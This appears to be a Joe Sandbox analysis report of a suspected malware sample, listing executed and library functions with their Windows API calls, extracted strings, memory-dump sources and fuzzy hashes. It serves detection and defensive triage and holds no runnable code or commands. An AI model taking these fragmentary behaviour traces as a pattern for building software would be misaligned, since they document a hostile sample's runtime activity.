Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction Fuzzy Hash: E2214BA2AC0101A6DB30CB55C902B9B7356EF6CB24F569526EA89C7300F73EDD11C35E

Function 00401F00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F1B
GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F40

Strings

image/png, xrefs: 00401F4E

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: EncodersGdipImage$Size
String ID: image/png
API String ID: 864223233-2966254431
Opcode ID: bf724acd2d36aea3cd7c71ac0e6082fc752fbcd53218ac2ebd3932cd8158d6bf
Instruction ID: e538c811f89b171702b8ca366793f889c85100130971bf928fd16bdf8145c3c0
Opcode Fuzzy Hash: bf724acd2d36aea3cd7c71ac0e6082fc752fbcd53218ac2ebd3932cd8158d6bf
Instruction Fuzzy Hash: 5211737AD0410AFFCB119FA99C8149EBB7AFF45321B20027BEC10B32E0C7759E459A54

Function 0040EF1C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000D,?,0040DE37,0040C64F,?,?,00000000,?,0040C51F,0045D5E4,0040C4EC,0045D5DC,?,ios_base::failbit set,0040C64F), ref: 0040EFA0

Strings

<(@, xrefs: 0040EF1F

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: ErrorLast
String ID: <(@
API String ID: 1452528299-4189137628
Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
Instruction ID: 966c5171ab2b841c9a1c941c3673e83940a55d69d5d5609413e6151fa891d796
Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
Instruction Fuzzy Hash: 9711C236200216BFCF129F61DC4496ABB65BB08715B11443AFA46E6290CB70DC219BD5

Function 0040C506 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 0040C54A

Strings

<(@, xrefs: 0040C53D
ios_base::failbit set, xrefs: 0040C506

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: <(@$ios_base::failbit set
API String ID: 4194217158-2207043977
Opcode ID: 174064d188b15a0c3ff1a9ac464eba264744374b79093bf8ecbc9bf692508c87
Instruction ID: 510b138892f27541a5fc2b77746a8308bc81fd1abdf09eb2229577c7a084af3c
Opcode Fuzzy Hash: 174064d188b15a0c3ff1a9ac464eba264744374b79093bf8ecbc9bf692508c87
Instruction Fuzzy Hash: A7F0547260022876D2306A5ABC41B97FBCC8F51B65F24843FFD44966C2EBB8A94545EC

Function 0041D9FB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041DA43
__CxxThrowException@8.LIBVCRUNTIME ref: 0041DA51

Strings

pContext, xrefs: 0041DA3B

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 1687795959-2046700901
Opcode ID: b2b82f4ab1e1eb8f3cfb2c3a53c14f3a8e7351539c320be7adb159790f5600bc
Instruction ID: ade17e21382ede40b1a5952a82a6294f61ec456501e49cb394cb07b135f863e7
Opcode Fuzzy Hash: b2b82f4ab1e1eb8f3cfb2c3a53c14f3a8e7351539c320be7adb159790f5600bc
Instruction Fuzzy Hash: E6F05939B005156BCB04EB59DC45C5EF7A9AF85760310007BFD02E3341DBB8ED068A98

Function 0044067A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00440681

Strings

MOC, xrefs: 004406A4
RCC, xrefs: 004406B3

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: H_prolog3_catch
String ID: MOC$RCC
API String ID: 3886170330-2084237596
Opcode ID: 049c7e4c23b10554081dcb12690fd44b5a77b1d87ca30f0fc835f9c7ef2e3319
Instruction ID: c6f184ec75521e876e515d43f5ba00c5ed257f9a1274f206ffdf003c13f5d3fb
Opcode Fuzzy Hash: 049c7e4c23b10554081dcb12690fd44b5a77b1d87ca30f0fc835f9c7ef2e3319
Instruction Fuzzy Hash: 90F0A970640224CFDB22EF55E00555D3BB0AF92708F8640ABFC019B261CB3C9E658BAA

Function 0213FC75 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 02149764: GetEnvironmentStringsW.KERNEL32 ref: 02149768

_free.LIBCMT ref: 0213FCB6
_free.LIBCMT ref: 0213FCBD

Strings

^X, xrefs: 0213FC75, 0213FCA3

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: _free$EnvironmentStrings
String ID: ^X
API String ID: 3523873077-2780380544
Opcode ID: 74b13d0fcde66366100e3dca1cb45a37efbb8a6426e7ea2b6f327c2869fbdbbd
Instruction ID: f6aa0d56f4f24761c83c8221f1e947a3ed2336ebb98acb5a4141819f5af9af77
Opcode Fuzzy Hash: 74b13d0fcde66366100e3dca1cb45a37efbb8a6426e7ea2b6f327c2869fbdbbd
Instruction Fuzzy Hash: F3E0ED23EC5A1549EB72222A3C00EAB0A0B4F81739F11022AED34C65C2EF248C0B099A

Function 00404DFD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E32

Part of subcall function 0040BF53: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF67
Part of subcall function 0040BF53: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFA4

std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E46

Part of subcall function 0040BFFE: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C025
Part of subcall function 0040BFFE: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C096

Strings

F@, xrefs: 00404E3E

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: F@
API String ID: 2118720939-885931407
Opcode ID: f77639d1be2741e1496218e28cc5a769408766ab269e632485ad6d388fdfb1e8
Instruction ID: d8e2bd5d7c2d17c0e6b385c3bfe6b7baa890588314637a55e0c2b4eea0cd1ccb
Opcode Fuzzy Hash: f77639d1be2741e1496218e28cc5a769408766ab269e632485ad6d388fdfb1e8
Instruction Fuzzy Hash: 80F058B14002069BEB20AF55C81279DB361FF80715F50843FE945BB2C1CB7CAA44CB8C

Function 00428D67 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00428D73
__CxxThrowException@8.LIBVCRUNTIME ref: 00428D9A

Part of subcall function 004285FD: RaiseException.KERNEL32(?,?,0040D874,00000000,00000000,00000000,00000000,?,?,?,?,0040D874,00000000,0045617C,00000000), ref: 0042865D

Strings

Access violation - no RTTI data!, xrefs: 00428D6A

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
String ID: Access violation - no RTTI data!
API String ID: 2053020834-2158758863
Opcode ID: 45152e5ace4b67971f4d5196e44e91b2d4b717c3ebfeb118b54d173c581d92e8
Instruction ID: 73ada6d1c6168317e08ecea3a8bb530ed306f4920f562436bdd15de4f867cbc4
Opcode Fuzzy Hash: 45152e5ace4b67971f4d5196e44e91b2d4b717c3ebfeb118b54d173c581d92e8
Instruction Fuzzy Hash: FDE0DF726593186A9A04DA91B8469DE73EC8A14300BA0041FBE0092082EF2CF958826D

Function 0042380B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042381E

Strings

jB, xrefs: 00423811
nB, xrefs: 00423817

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: ContextInternal$BaseBase::~Concurrency::details::
String ID: jB$nB
API String ID: 3275300208-1818383504
Opcode ID: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
Instruction ID: 59cecdb31c0df98e9f45a8df7d3f0483270f31b7733147966a644d233ca5dfda
Opcode Fuzzy Hash: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
Instruction Fuzzy Hash: 20D05E3228C3252AE3346E5DB8017C6BAD88F01764F50C03FF94896682CFB9688882DC

Function 004212AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212CB
__CxxThrowException@8.LIBVCRUNTIME ref: 004212D9

Strings

pThreadProxy, xrefs: 004212C3

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument
String ID: pThreadProxy
API String ID: 1687795959-3651400591
Opcode ID: 2bbaacc652030cb53615086be0ecc54042dc20d6199239edbaca0bb31b3565f8
Instruction ID: 8e926060578bb0aca53d69262477d947a6492ed66be404d99a0d2172ee8e52cc
Opcode Fuzzy Hash: 2bbaacc652030cb53615086be0ecc54042dc20d6199239edbaca0bb31b3565f8
Instruction Fuzzy Hash: DFD05B31E0020866D700EBB5D806E4E77E85B10708F91457B7D15E6143EB78E5088AAC

Function 004394AD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32 ref: 004394AD
GetCommandLineW.KERNEL32 ref: 004394B8

Strings

`%W, xrefs: 004394B3

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: CommandLine
String ID: `%W
API String ID: 3253501508-2859075202
Opcode ID: 7496f3f1f43a5bc4f5ff7b5e8a7696d052f6bc66573cc841d28ce311f0d10aa6
Instruction ID: a72b382a13dd36543230f851506b27d64c175e456db285366795c2c72c230a95
Opcode Fuzzy Hash: 7496f3f1f43a5bc4f5ff7b5e8a7696d052f6bc66573cc841d28ce311f0d10aa6
Instruction Fuzzy Hash: 15B0487C8003008BC7108F28AA081043AA0BA0BA0338002B5D4099233AD734A1008E08

Function 0213B0E1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,02112AA3,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,02112AA3,00000000), ref: 0213B177
GetLastError.KERNEL32 ref: 0213B185
MultiByteToWideChar.KERNEL32(?,00000001,?,?,02112AA3,00000000), ref: 0213B1E0

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
Instruction ID: d0ddb576cf742f42bd3883424a7860cff4b978e402ddda71355212b88054e962
Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
Instruction Fuzzy Hash: 8C41E631648206AFCB278F65D844BBEBBB7FF01329F154269E85967190EB30AB01CB50

Function 0042AE7A Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,<(@,00000000), ref: 0042AF10
GetLastError.KERNEL32 ref: 0042AF1E
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF79

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
Instruction ID: b4e4fd9a0f0a1cd091c58849f1b07b04ac885d72683c28cc61e5c451b31866ac
Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
Instruction Fuzzy Hash: AF413870700222AFCB229F65EA44A6BBBA4EF01310F96416FFC5597291D73C8D11C75A

Analysis Process: 89AC.tmp.exePID: 7252, Parent PID: 4468COMMON

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	32.6%
Signature Coverage:	11.6%
Total number of Nodes:	95
Total number of Limit Nodes:	4

Executed Functions

Function 00408880 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 180
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 004088A4
GetCurrentThreadId.KERNEL32 ref: 004088AE
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408955
GetForegroundWindow.USER32 ref: 0040896A
ExitProcess.KERNEL32 ref: 00408AB7

Strings

6W01, xrefs: 004089B5

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID: 6W01
API String ID: 4063528623-326071965
Opcode ID: 39779329cba8329f932d9f79242290fe4725b3bdf2e9b5d89c9d7ceec3140c35
Instruction ID: 68999dc676c32329d0dd7cdb3a03855c51f4a57e0b82bf1efaa177e53c028fce
Opcode Fuzzy Hash: 39779329cba8329f932d9f79242290fe4725b3bdf2e9b5d89c9d7ceec3140c35
Instruction Fuzzy Hash: A0516A73B443040BD328EF659C46356BA879BC5314F0AC13EA985BB7E2ED78980586CA

Function 0040B2B0 Relevance: 9.3, Strings: 7, Instructions: 518
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

K{Du, xrefs: 0040B3DA
?_oY, xrefs: 0040B389
Bc*}, xrefs: 0040B3C6
fWpQ, xrefs: 0040B397
@w@q, xrefs: 0040B3E4
`/(), xrefs: 0040B588
6C(], xrefs: 0040B382

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID:
String ID: 6C(]$?_oY$@w@q$Bc*}$K{Du$`/()$fWpQ
API String ID: 0-74227037
Opcode ID: 38d3abca32f2cf0db45db9bcd24ebb0db54af3e6334d844c9839fcbf09972b5b
Instruction ID: 6cbb9b4a16d706e95eb7c5eb543f19fb0438a443f67131002351f3f2f8f3bf58
Opcode Fuzzy Hash: 38d3abca32f2cf0db45db9bcd24ebb0db54af3e6334d844c9839fcbf09972b5b
Instruction Fuzzy Hash: FA1299B5205B01CFD324CF25D891B97BBF6FB45314F058A2DD5AA8BAA0DB74A406CF84

Function 0040AA32 Relevance: 2.6, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

MO, xrefs: 0040A9CF
MO, xrefs: 0040AA37

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID:
String ID: MO$MO
API String ID: 0-3148518880
Opcode ID: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
Instruction ID: de3bae81b745c0a1c58d0910fc7dee7dc7ce1027ddf7ad09ed428793afe2e5a8
Opcode Fuzzy Hash: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
Instruction Fuzzy Hash: BB119E742443818BEF148F649D916677FA0EF42320B2499A99C455F3CBC638C511CF69

Function 004402C0 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0044316E,007E70F8,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 004402EE

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0212003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0212024D

Strings

kernel32.dll, xrefs: 0212008F, 02120095
cess, xrefs: 0212018D

Memory Dump Source

Source File: 00000007.00000002.1602257379.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2120000_89AC.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 6307871ac7b424446d8f48e480cf3fe90682051c211dfdc8c527356dcb06ef3a
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 61526A74A01229DFDB64CF58C984BACBBB1BF09304F1581D9E54DAB351DB30AA99CF14

Function 00793D86 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00793DAE
Module32First.KERNEL32(00000000,00000224), ref: 00793DCE

Memory Dump Source

Source File: 00000007.00000002.1601705036.0000000000793000.00000040.00000020.00020000.00000000.sdmp, Offset: 00793000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_793000_89AC.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 40b92f7ef0939eeb978fd27e41b56b296017472b6b3267b11474770dc8eb8aa1
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: B7F0C2312007106FEB203AB4AC8CA6A76E8AF49720F100128E656D14C0DA74E9058661

Function 02120E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02120223,?,?), ref: 02120E19
SetErrorMode.KERNELBASE(00000000,?,?,02120223,?,?), ref: 02120E1E

Memory Dump Source

Source File: 00000007.00000002.1602257379.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2120000_89AC.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 44aadaba4ceec3c7039f90236b980d150b62195d6aed535f06090d2979b601d5
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 68D012311451287BD7002A94DC09BCD7B1CDF09B66F108011FB0DD9080C770954046E5

Function 00440260 Relevance: 1.5, APIs: 1, Instructions: 30
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B9C7,00000000,00000001), ref: 00440292

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e3ca6a36a028ff54866f16376779860b9096701dd45936173a9f18f59b7a354d
Instruction ID: c7e132dbbf166c87dd4ca7ba8e526d96017081e21b1d4d371130b4eff19db060
Opcode Fuzzy Hash: e3ca6a36a028ff54866f16376779860b9096701dd45936173a9f18f59b7a354d
Instruction Fuzzy Hash: C3E02B32404310ABD2026F397C06B177674EFC6715F05087AF50156151DB38F811C5DE

Function 0040AB12 Relevance: 1.5, APIs: 1, Instructions: 20
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000202), ref: 0040AB46

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: b187d8107ffde8e05c7d0a09cdfc1bb296f851924af62c815b9bdc52e44f9908
Instruction ID: 8daa5b18d499817a70b2f557c0c6df6f58e6f2abf740e83111143c9212bc1643
Opcode Fuzzy Hash: b187d8107ffde8e05c7d0a09cdfc1bb296f851924af62c815b9bdc52e44f9908
Instruction Fuzzy Hash: 0AE02B7A5D5104BBF2486751FD4FC563616BB4330AB08413DFC185017BD6511426C66A

Function 0043EB40 Relevance: 1.5, APIs: 1, Instructions: 15
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(?,00000000,?,004402AB,?,0040B9C7,00000000,00000001), ref: 0043EB60

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 81edc790b0ddca4267d7eff7df3f20d03a026a9a6739d0257eb6886926d10809
Instruction ID: 6306fd139b63709815d779222b474fbda691f96f30962fae2caf2063fc0eb5d0
Opcode Fuzzy Hash: 81edc790b0ddca4267d7eff7df3f20d03a026a9a6739d0257eb6886926d10809
Instruction Fuzzy Hash: FDD0C931445536FBC6102F28BC06BCB3B94EF497A5F0708A5F540AA075E725DC918AD8

Function 004404B1 Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 004404BF

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: ac82542d7ead4e5736e61cdedea6fc5be5df443e6220e35db9291a32a896b3cb
Instruction ID: 7f86c14d6ce35f706de72b94d0a04e46592ace6e5707a2a12f6891b8fa8e10aa
Opcode Fuzzy Hash: ac82542d7ead4e5736e61cdedea6fc5be5df443e6220e35db9291a32a896b3cb
Instruction Fuzzy Hash: 15E0E2B9900214DBEB44CF68FC9592933B5EB8B3093040439E202C3362EA34E602CF59

Function 0043EB20 Relevance: 1.5, APIs: 1, Instructions: 9
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,E931068D,004089CF,6W01), ref: 0043EB30

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 79e8824736e673c164acaa36c8672ab8da0624bb6b492fb9ad0aed697a58ad7a
Instruction ID: faa30900258afa928b287b4fa720072893bcbdc8cd762d9751037a3417221d58
Opcode Fuzzy Hash: 79e8824736e673c164acaa36c8672ab8da0624bb6b492fb9ad0aed697a58ad7a
Instruction Fuzzy Hash: 91C04C31045120ABD5506B15EC05BC63B54DF852A5F020065B105660718660ACC2C698

Function 00793A45 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00793A96

Memory Dump Source

Source File: 00000007.00000002.1601705036.0000000000793000.00000040.00000020.00020000.00000000.sdmp, Offset: 00793000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_793000_89AC.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 2af1127190a3ae3aeb30ed2fa9a7a7e8bbe382f595227e384394f7d07cec5c56
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 6B112B79A00208EFDB01DF98C985E98BBF5EF08350F058094F9489B362D375EA50DB80

Non-executed Functions

Function 0043B870 Relevance: 35.9, APIs: 10, Strings: 10, Instructions: 880memorycomCOMMON

